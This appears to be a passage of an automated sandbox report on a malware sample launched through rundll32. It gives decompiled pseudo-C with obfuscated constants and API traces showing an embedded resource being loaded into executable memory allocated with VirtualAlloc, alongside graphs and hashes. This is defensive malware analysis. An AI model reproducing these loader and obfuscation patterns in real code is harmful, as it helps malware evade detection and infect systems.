                                                                                                                          				E0023AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
                                                                                                                          				_t25 = LoadLibraryW(_a8); // executed
                                                                                                                          				return _t25;
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • LoadLibraryW.KERNEL32(00000000), ref: 00235C6D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                          • Instruction ID: 337dcdd8b94671efe68200750d5c3888877b3508ff4baa01b97a8b2e2b4ee655
                                                                                                                          • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                          • Instruction Fuzzy Hash: 98F0ECB5C1020CFBCB04AFE4DA06AEEBBB4EB40318F108188E95566212D3B58B58DB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E0022B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _t27;
                                                                                                                          				int _t32;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E002320B9(_t27);
                                                                                                                          				_v12 = 0x6268;
                                                                                                                          				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                          				_v12 = _v12 + 0xffff2919;
                                                                                                                          				_v12 = _v12 + 0xffff3e3d;
                                                                                                                          				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                          				_v8 = 0xa46433;
                                                                                                                          				_v8 = _v8 + 0x98ba;
                                                                                                                          				_v8 = _v8 | 0xc390ebe9;
                                                                                                                          				_v8 = _v8 + 0xd5b0;
                                                                                                                          				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                          				E0023AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                          				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                          				return _t32;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0022B2C1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1586166983-0
                                                                                                                          • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                          • Instruction ID: 79d75e185b8a23f7cba23e9b3ccb4cfc72c2184de82b87b876c31b30fa0662b2
                                                                                                                          • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                          • Instruction Fuzzy Hash: E30116B2C04608FFDF45DFD4DD468AEBBB5EB44304F208188B90566262E3728B64AB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E00231E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				void* _t23;
                                                                                                                          				int _t29;
                                                                                                                          
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E002320B9(_t23);
                                                                                                                          				_v16 = _v16 & 0x00000000;
                                                                                                                          				_v24 = 0x62b4e9;
                                                                                                                          				_v20 = 0xc383c4;
                                                                                                                          				_v12 = 0x238243;
                                                                                                                          				_v12 = _v12 * 0x67;
                                                                                                                          				_v12 = _v12 ^ 0x0e4d658b;
                                                                                                                          				_v8 = 0x6564d0;
                                                                                                                          				_v8 = _v8 ^ 0x2b193590;
                                                                                                                          				_v8 = _v8 << 0xd;
                                                                                                                          				_v8 = _v8 ^ 0x8a2acb03;
                                                                                                                          				E0023AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
                                                                                                                          				_t29 = CloseHandle(_a12); // executed
                                                                                                                          				return _t29;
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00C383C4), ref: 00231EE1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2962429428-0
                                                                                                                          • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                          • Instruction ID: 351a04246e6b1c804a779d82c84d22d807571838b71a2bbb18183c49ec1b784a
                                                                                                                          • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                          • Instruction Fuzzy Hash: 1E014BB5C1020CFBCF40EFA4D94A99EBFB5EB04304F108498E81567252D7718B28DF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:16.1%
                                                                                                                          Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:297
                                                                                                                          Total number of Limit Nodes:23

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                          • _printf.LIBCMT ref: 1001265F
                                                                                                                          • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                          • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                          • _malloc.LIBCMT ref: 100127F5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                          • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                          • API String ID: 572389289-2839844625
                                                                                                                          • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                          • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                          • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                          • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                          • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452528299-0
                                                                                                                          • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                          • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                          • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                          • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                          APIs
                                                                                                                          • _malloc.LIBCMT ref: 10006A9C
                                                                                                                            • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                            • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                            • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 501242067-0
                                                                                                                          • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                          • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                          • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                          • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                          • GlobalHandle.KERNEL32(003B7AF0), ref: 100208A9
                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                          • GlobalHandle.KERNEL32(003B7AF0), ref: 100208DB
                                                                                                                          • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                          • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                          • _memset.LIBCMT ref: 10020911
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 496899490-0
                                                                                                                          • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                          • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                          • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                          • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • __lock.LIBCMT ref: 1002FA87
                                                                                                                            • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                            • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                            • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                          • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                          • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                          • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                          • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2714421763-0
                                                                                                                          • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                          • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                          • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                          • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                          APIs
                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                          • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$CreateDestroy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3296620671-0
                                                                                                                          • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                          • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                          • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                          • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                          • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                          • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                          • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                          • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%